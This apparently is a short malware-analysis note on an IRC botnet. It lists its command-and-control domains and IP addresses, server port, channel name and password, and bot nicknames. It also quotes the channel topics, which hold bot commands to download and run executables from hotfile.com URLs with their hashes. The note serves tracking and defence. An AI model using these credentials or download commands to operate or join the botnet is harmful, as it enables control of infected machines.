Resolved : [esta4.info] To [216.172.132.123]
other domain names used from same guy:
jer0002.in
Resolved : [jer0002.in] To [216.172.132.123]
jer0003.in
Resolved : [jer0003.in] To [216.172.132.123]
ratk01.com
Resolved : [ratk01.com] To [216.172.132.123]
Remote Host Port Number
199.15.234.7 80
216.172.132.123 1887 PASS powned
NICK n{US|XPa}rqrrlpw
USER rqrrlpw 0 0 :rqrrlpw
JOIN #sbsb powned
JOIN #XP
JOIN #US
Now talking in #sbsb
Topic On: [ #sbsb ] [ ~pu http://hotfile.com/dl/164036091/80bcddd/peterete.exe babba493b3e92457c36188bfc78bc957 ~s -o ~s ]
Topic By: [ google ]
Modes On: [ #sbsb ] [ +smntMu ]
UPDATE:
Resolved : [esta4.info] To [208.117.34.38]
Resolved : [esta4.info] To [67.202.109.117]
C&C Server: 208.117.34.38:1887
Server Password:
Username: lxdklyi
Nickname: n{DE|XPa}lxdklyi
Channel: #sbsb (Password: powned)
Channeltopic: :~pu http://hotfile.com/dl/168408773/a60a4d2/nueveee.exe 291387309ea5c7db73d73b531d44ccb5 ~s -o ~s
hosting infos:
http://whois.domaintools.com/216.172.132.123